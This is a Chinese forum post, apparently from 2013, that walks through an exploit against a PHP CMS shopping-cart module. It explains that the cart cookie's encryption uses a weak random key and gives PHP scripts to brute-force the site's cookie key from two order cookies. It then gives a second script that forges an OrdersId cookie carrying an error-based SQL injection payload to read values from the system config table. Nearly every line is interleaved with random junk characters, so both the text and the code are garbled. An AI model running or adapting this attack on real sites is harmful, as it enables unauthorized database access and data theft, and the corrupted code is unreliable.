www.xxx.com/plus/search.php?keyword=
" P! f- c# ~4 F$ _! `; P1 @+ [6 x在 include/shopcar.class.php中' }* }8 P/ G7 d$ j7 y5 N; G) W
先看一下这个shopcar类是如何生成cookie的# l! {7 v8 P/ O3 m8 f
239 function saveCookie($key,$value)7 [& y) m, \: @
240 {
8 T0 @4 d: {. f* O( |! A5 q241 if(is_array($value))% _9 f6 G8 _% g5 U% U2 l, l
242 {
b( Q W5 X% S5 n$ C243 $value = $this->enCrypt($this->enCode($value));& M( X1 [; y1 R) d; i
244 }3 ]2 B- ^% h- d5 U
245 else: q1 a" p& {% w2 U% Q% W0 N% S
246 {
$ d, O& Q& p! |2 g. w247 $value = $this->enCrypt($value);
+ e; t2 R# w! w2 F1 b9 @248 }& {; E g: D' `
249 setcookie($key,$value,time()+36000,’/');
( B8 H! w8 k$ k) e) S# T250 } U) K* D3 \9 ^1 P4 H, z
简单的说,$key就是cookie的key,value就是value,enCode的作用是将array类型转变为a=yy&b=cc&d=know这样的类型,关键是enCrypt函数$ E+ |& N- M3 ^ f) f4 b
186 function enCrypt($txt)3 M7 F/ R& Q6 ^- I" I/ R8 U
187 {
" G" w3 v a* v# f188 srand((double)microtime() * 1000000);
( z$ K8 |9 m" ^4 m# A+ e0 h189 $encrypt_key = md5(rand(0, 32000));
- }1 {0 a9 D" I; [% H* R2 R5 [+ ^" c190 $ctr = 0;% S2 |) ?' Y6 T" K! v! |+ r; _/ H/ q& I
191 $tmp = ”;3 Y+ N; [ a" T8 H
192 for($i = 0; $i < strlen($txt); $i++); N) M9 c% d* }
193 {5 z) B9 L, d5 u' I3 E
194 $ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
5 n) E# \# [1 x195 $tmp .= $encrypt_key[$ctr].($txt[$i] ^ $encrypt_key[$ctr++]);; R* V; }3 T, [, B
196 }% N& C+ H/ A9 n6 ]1 k q
197 return base64_encode($this->setKey($tmp));# L, x$ g* b' i2 s: {. `
198 }8 e2 X: c! u. k/ x8 w$ o
213 function setKey($txt)+ c9 U" ~% ?2 I) {1 P# \
214 { R& a) {6 X3 ^/ G
215 global $cfg_cookie_encode;
8 E d& Z7 u3 @: H; n216 $encrypt_key = md5(strtolower($cfg_cookie_encode));" H: U" G( m" `6 {9 a5 T
217 $ctr = 0;' F) V$ }: i' V: i! ~. H- L
218 $tmp = ”;% X/ i9 ] h5 P) |. v; ?) Q
219 for($i = 0; $i < strlen($txt); $i++)
' Q+ M; E( b/ v: a5 F5 K9 ~1 S% T6 N* ]220 {6 P) s7 P6 j0 X/ ]& A
221 $ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
) X# C; {; M4 }# B8 k5 e222 $tmp .= $txt[$i] ^ $encrypt_key[$ctr++];
/ y( J& u, P) {3 Z223 }
' |5 Z* ^' v7 ?2 K224 return $tmp;
6 z! u) v! o( v( i# n, [( b+ B3 S225 }7 T/ U" K2 K6 f& u6 b
enCrypt的参数$txt 我们是可知的,返回值就是cookie的值,这个我们也是可知的% V$ P: i( _3 ~) f
然后到了enCrypt调用 setKey时的参数$tmp,这个参数在某种意义上,我们也是可知的,因为$encrypt_key = md5(rand(0, 32000));只有32000种可能,我们可以推出32000种可能的$tmp,从而推出32000种可能的md5(strtolower($cfg_cookie_encode)),对了,忘记说了,我们的目的是推测出setKey中$encrypt_key的值,然后才能任意构造出购物车的cookie,从推出的32000种md5(strtolower($cfg_cookie_encode)),简单过滤掉非字母数字的key,就只剩下几百个可能的key,然后我们再从新下一次订单,然后再获取几百个可能的key,然后取交集,得到最终key。7 e d4 o+ [& y$ I: X" s( A
具体代码如下:$ S$ Q% T0 S* [9 ?8 h6 k9 {7 F B1 @
<?php
0 J5 ^* @! E4 g8 C( v$cookie1 = “X2lRPFNlCmlWc1cvAHNXMABjAToHbVcyB3ZXJFIwA20LIAlzU2ULPARyAmQGIVU5VyJbfFVsBiYNN1dsUG0DIl90UTFTLAo3VjBXYgBvVzgAZAEqBz9XagclVzBSbw==”; // here is the first cookie,change here
5 g k9 }2 S; k7 t$cookie2 = “ADYCb1RiBmUDJghwUyAFYlIxW2BROwhtVCUIe1AyC2UOJVMpADYBNgJ0AmRUcw5iAncAJ1JrCSlQalBrAj8CIwArAmJUKwY7A2UIPVM8BWpSNltwUWkINVR2CG9QbQ==”; // here is the second cookie ,change here
5 A2 m. D/ x0 C' T; f$plantxt = “id=2&price=0&units=fun&buynum=1&title=naduohua1″; // here is the text , change here
6 M( x* W7 X- N8 ^function reStrCode($code,$string)
4 j0 d. Y* J0 X{
. e8 b0 `- v- i1 Q5 N$code = base64_decode($code);7 @: w6 l t9 z- h% ~/ g/ K
$key = “”;
( i- U2 B3 b. `( Ffor($i=0 ; $i<32 ; $i++)& x3 a9 O# d5 q& a2 A, h
{1 S7 _9 L' @* v- f, J' Q5 J
$key .= $string[$i] ^ $code[$i];
( p& P. B/ i; d2 Y% y}0 N' P( E4 N/ e
return $key;, S7 l- H' H" T8 A
}4 K* R8 J |1 O
function getKeys($cookie,$plantxt)
. d7 m1 Y! b ~{
4 B( K" E: w; c; X' G$ M$tmp = $cookie;( [$ x9 C; z U' Y, L" W; W9 a" ?
$results = array();6 ^ | K4 W4 `6 b7 p/ h1 P" C
for($j=0 ; $j < 32000; $j++)$ B/ ^5 X, e. y# p% X w
{6 |% K9 j$ T& J9 F u
4 b/ b1 r K0 t9 s+ D
$txt = $plantxt;% h0 Z* l& _7 a( Z6 G
$ctr = 0;
& J2 }! E: i9 U& j; G: t/ p+ t$tmp = ”;1 S# ]8 g$ r" _$ L. P
$encrypt_key = md5($j);
, m+ @2 [: }' L$ a( o8 yfor($i =0; $i < strlen($txt); $i ++)8 R- J# e" M B4 P' W5 a
{
/ ?( z. v1 j2 I0 p' Y+ a0 m$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;; s' `( N9 G# P i: Q
$tmp .= $encrypt_key[$ctr].($txt[$i] ^ $encrypt_key[$ctr++]);, q% I$ x! y1 f
}' i1 @, O7 o+ K( i
$string = $tmp;
" q: s5 d$ t* l) }3 ?0 l% T4 h8 f$code = $cookie;! d' x* K# a0 S" X$ L9 o+ Z* N
$result = reStrCode($code,$string);5 T# n& e- O5 D2 `0 p& D5 q. r
if(eregi(‘^[a-z0-9]+$’,$result))
0 R3 m6 e3 p% o{
5 c+ j, v8 }) W m) recho $result.”\n”;% z6 l8 G- @' P" C% d& @7 P. B
$results[] = $result;
( C& b; z0 E @0 ^& u}& U( I* a/ I8 c$ r: O9 @4 ^8 V
}
; R4 W6 m7 }/ o2 ?return $results;* n" r- u$ }, i+ m* W5 C. ^9 u$ f
}+ t5 H0 s( }. n# v+ g
$results1 = getKeys($cookie1,$plantxt);
3 ~+ Z" N+ T0 x% i4 {6 f! d- z% T$results2 = getKeys($cookie2,$plantxt);
# M4 G' g0 Q/ @* o& l q# [$ vprint “\n——————–real key————————–\n”;5 i9 ]! j3 Q& ]5 u
foreach($results1 as $test1)
. M) ~) t' g( Q( k{
6 @# B1 [8 H% [$ i2 M2 r9 N$ w, xforeach($results2 as $test2)
8 z( K5 Z U2 n8 A! T+ M8 V- r$ v7 t{
, N; w- N0 t0 T; s0 P9 Kif($test1 == $test2) a/ [7 U& O+ U( u
{) C. s1 i7 C1 M2 l; N
echo $test1.”\n”;
& Q8 o$ W9 n: F$ u) X}
. D9 d" b/ Z9 }# y- f- @}% [) M+ V7 r9 w0 [# r( F! }7 R3 W
}
0 b5 P: w! ?1 R. A. c+ f3 j?>, i( T8 U4 Z" I# j# N( E; i' q
cookie1 和 cookie2 是我下了两次订单后分别生成的cookie,
' V8 r7 e( G/ |0 v; Bplantxt可以根据页面来自己推算,大概就是这个格式:id=2&price=0&units=fun&buynum=1&title=naduohua12 w4 c+ k3 Q7 ^0 J+ B1 K2 @
然后推算出md5(strtolower($cfg_cookie_encode))
. c# _# N: {% T9 v- J/ x! Y+ I得到这个key之后,我们就可以构造任意购物车的cookie7 f {6 G0 ?: o1 k* I: n; G; g- F4 n
接着看" x- `7 D3 R) l) s
20 class MemberShops% z! i9 k4 q3 q1 I% x
21 {
% d* }! i3 K4 a' p0 Z- F22 var $OrdersId;$ z# j! O6 j+ z
23 var $productsId;
) [' N. ~# F; u# K& s" Y! y24 t' l( {+ {- q7 h
25 function __construct()3 a0 e5 b1 i, S5 D2 s5 ]
26 {
, j6 J+ H, m% g4 f) _27 $this->OrdersId = $this->getCookie(“OrdersId”);6 @, }, ~% @ m l- b7 e: J/ \
28 if(empty($this->OrdersId))4 z1 U7 K* C/ @" C; E2 Q' q; q* t
29 {
2 P7 b3 @/ ^) p- e. E1 E30 $this->OrdersId = $this->MakeOrders();3 ]1 w" {) [# d3 }; J0 |8 i
31 }3 R l' x* q6 x1 ]% ~7 h
32 }
2 V/ ]( G' f& B: ^8 n; M发现OrderId是从cookie里面获取的( `' c }$ @+ L% S/ V
然后2 H( i( D3 x- s/ h& h
/plus/carbuyaction.php中的# o% W/ C" k' Q5 I& h- g: q
29 $cart = new MemberShops(); d/ W) L! K# ^& k5 R
39 $OrdersId = $cart->OrdersId; //本次记录的订单号
" {1 {/ f: p+ _; b( _1 R8 A……2 Z% G# Y f, c5 k( A( K
173 $rows = $dsql->GetOne(“SELECT `oid` FROM #@__shops_orders WHERE oid=’$OrdersId’ LIMIT 0,1″);
+ h4 B9 D9 {# v% z# j j6 x* H2 O' U4 Q接着我们就可以注入了5 r' P: L, a* o) ?$ G
通过利用下面代码生成cookie:
' b9 H) j9 F \/ v8 i<?php/ V0 B% P' j) g$ d( a8 g% C, E' j
$txt = “1′ or 1=@`\’` and (SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(substring((select value from #@__sysconfig where aid=3),1,62)))a from information_schema.tables group by a)b) or 1=@`\’` or ’1′=’1″;
2 [" n o V& \& C2 R+ U3 q$encrypt_key = “9f09293b7419ed68448fb51d5b174834″; // here is the key, please change here& Z1 w% @, N$ A3 y# N _
function setKey($txt)" \9 G3 W+ r$ W, G# b8 E: p6 ?
{1 W! m/ y; g% e& B/ ?% O" ^) C
global $encrypt_key;
5 B* I" b ~& a- @* X$ctr = 0;2 c [& b9 _4 C1 h9 w# _% `* Z
$tmp = ”;
% X9 U: P& R' u. ~# U& v# Ufor($i = 0; $i < strlen($txt); $i++)
. t6 c- L; k9 K7 o{
7 T" T# l& ~) G# f$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
[+ s3 M9 J: J$tmp .= $txt[$i] ^ $encrypt_key[$ctr++];4 x) }' X4 r6 S* [! ~
}
( n! I4 A1 q9 a+ z; ereturn $tmp;7 O; f _- o; x% i) f! A- e7 l: _0 A8 g
}/ S! a/ @9 n7 N$ F3 q
function enCrypt($txt)- h } u+ U6 {2 f
{
4 ?8 H9 t, e/ E" z1 ]7 ^8 |6 zsrand((double)microtime() * 1000000);# g3 I2 p) z& ^7 w0 F; w
$encrypt_key = md5(rand(0, 32000));( B- P+ q! n; h/ `7 h8 H2 c
$ctr = 0;
0 m/ l* R8 T- J' B$tmp = ”;7 Z% \8 o7 Z. Z
for($i = 0; $i < strlen($txt); $i++)( M& z! n8 ^2 B
{
& X3 k: u: Y: }; }$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
# E5 o- j8 c) @$tmp .= $encrypt_key[$ctr].($txt[$i] ^ $encrypt_key[$ctr++]);
3 z' ]' @3 S* G/ d/ Z5 ?# U}
1 C0 ^9 w: v! A$ m) zreturn base64_encode(setKey($tmp));
, P6 y& z5 R* ~0 }}
2 {) Q, J9 p4 P3 N5 Gfor($dest =0;$dest = enCrypt($txt);)
! K; ?( s* J# n" F% [, S) D% _{5 W7 c7 [2 ]$ c6 K3 y8 q! B
if(!strpos($dest,’+'))
T" `$ T3 E& R9 h3 g- I/ f# Q{
: s6 H8 |& P: Y0 L2 Gbreak;
3 @2 L) M1 y" A0 V! V0 ~3 G}3 G% v' ~- g) ]' ~$ ?
}. W2 r$ k/ K5 i. n, N
echo $dest.”\n”;
+ d* q8 W' C( I. L- J?>8 G# z3 n( j2 l- ^* g0 ?! g; U1 b
9 ~7 P* R" Z9 }% }8 L) [ |
发表于 2013-2-13 23:58:29
收藏
支持
反对